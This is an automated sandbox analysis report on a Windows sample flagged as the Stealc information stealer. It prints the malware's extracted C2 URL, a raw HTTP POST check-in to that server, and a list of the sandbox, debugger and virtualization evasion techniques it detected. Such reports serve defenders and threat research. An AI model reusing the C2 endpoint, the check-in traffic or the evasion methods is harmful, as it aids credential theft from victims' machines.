Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524978
MD5:0c648c4dfca774a2f1d5204ac06ac5e0
SHA1:0a095f75ca3115203ccee6f839e284ee6bb361d2
SHA256:c942c65b0db11adce8f7bded91a98d91e9c236a47cab99ea49d89acdb020c734
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1212 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0C648C4DFCA774A2F1D5204AC06AC5E0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1212JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1212JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.b70000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T14:48:04.999687+020020442431Malware Command and Control Activity Detected192.168.2.849704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.b70000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00B7C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B79AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00B79AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B77240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00B77240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B79B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00B79B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B88EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00B88EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00B838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B84910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B84910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00B7DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00B7E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00B7ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B84570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00B84570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B7F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B83EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00B83EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00B7DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00B7BE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 38 38 37 41 32 37 32 31 42 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="hwid"3887A2721B951117388365------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build"doma------AKFIDHDGIEGCAKFIIJKF--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B74880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00B74880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFIDHDGIEGCAKFIIJKFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 38 38 37 41 32 37 32 31 42 39 35 31 31 31 37 33 38 38 33 36 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="hwid"3887A2721B951117388365------AKFIDHDGIEGCAKFIIJKFContent-Disposition: form-data; name="build"doma------AKFIDHDGIEGCAKFIIJKF--
                Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1485394788.000000000091E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37(
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpv
                Source: file.exe, 00000000.00000002.1485394788.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37o

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A50_2_00F428A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F338630_2_00F33863
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAD0280_2_00EAD028
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E689C30_2_00E689C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1C9400_2_00E1C940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F38AB50_2_00F38AB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F302120_2_00F30212
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E26BEE0_2_00E26BEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F353ED0_2_00F353ED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E7ABB50_2_00E7ABB5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FBA37A0_2_00FBA37A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3A4EC0_2_00F3A4EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3F4DA0_2_00F3F4DA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E474CA0_2_00E474CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F31CC30_2_00F31CC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4457A0_2_00F4457A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F40EF30_2_00F40EF3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2FFAD0_2_00E2FFAD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3BF670_2_00F3BF67
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DDFF050_2_00DDFF05
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F4A7010_2_00F4A701
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B745C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: vsethdti ZLIB complexity 0.9948937565337514
                Source: file.exe, 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1445038311.0000000004D90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B88680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00B88680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B83720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00B83720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\W17JLIX6.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 42%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1870848 > 1048576
                Source: file.exeStatic PE information: Raw size of vsethdti is bigger than: 0x100000 < 0x1a2800

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b70000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vsethdti:EW;ypmwblrh:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vsethdti:EW;ypmwblrh:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B89860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ca34f should be: 0x1d0a54
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: vsethdti
                Source: file.exeStatic PE information: section name: ypmwblrh
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FED8FD push 65FBCCE1h; mov dword ptr [esp], esi0_2_00FED926
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40D2 push 72CF50F1h; mov dword ptr [esp], ebx0_2_00FE4192
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE58CC push esi; mov dword ptr [esp], 45DFC6E0h0_2_00FE58E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB98B8 push ebx; mov dword ptr [esp], ebp0_2_00FB98FA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push ebp; mov dword ptr [esp], edi0_2_00F428F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 3684A221h; mov dword ptr [esp], edi0_2_00F42913
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push ebx; mov dword ptr [esp], 773FDA05h0_2_00F42965
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push edi; mov dword ptr [esp], ecx0_2_00F42970
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push esi; mov dword ptr [esp], edi0_2_00F429EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push ecx; mov dword ptr [esp], eax0_2_00F42A02
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 2D55DB80h; mov dword ptr [esp], edx0_2_00F42A17
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push ecx; mov dword ptr [esp], 27CE3B00h0_2_00F42A4D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push ebp; mov dword ptr [esp], eax0_2_00F42A80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 38D9B001h; mov dword ptr [esp], ecx0_2_00F42AD5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push edx; mov dword ptr [esp], ebx0_2_00F42B1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push ebp; mov dword ptr [esp], ecx0_2_00F42B4A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 2DF0F473h; mov dword ptr [esp], ecx0_2_00F42BED
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push eax; mov dword ptr [esp], esi0_2_00F42C05
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 2338460Fh; mov dword ptr [esp], edi0_2_00F42C0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push ebx; mov dword ptr [esp], 00000001h0_2_00F42C7A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push eax; mov dword ptr [esp], ebp0_2_00F42C93
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push edx; mov dword ptr [esp], edi0_2_00F42CF0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 278B83D4h; mov dword ptr [esp], eax0_2_00F42D47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 2476960Ah; mov dword ptr [esp], esi0_2_00F42D95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 40DBD939h; mov dword ptr [esp], edx0_2_00F42DE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push edi; mov dword ptr [esp], esp0_2_00F42DE7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 13F98E4Ch; mov dword ptr [esp], ecx0_2_00F42E2C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push 79B9358Ch; mov dword ptr [esp], edi0_2_00F42E98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push edx; mov dword ptr [esp], FEA65A37h0_2_00F42F3E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push eax; mov dword ptr [esp], ebp0_2_00F42F5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F428A5 push eax; mov dword ptr [esp], ebx0_2_00F42FAC
                Source: file.exeStatic PE information: section name: vsethdti entropy: 7.953545786264284

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B89860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B89860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13825
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49632 second address: F4965D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB958FCD44Ch 0x00000007 jmp 00007FB958FCD456h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497C2 second address: F497C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497C6 second address: F497CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497CF second address: F497D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F497D5 second address: F497DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49C8E second address: F49CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FB958B07021h 0x0000000e rdtsc
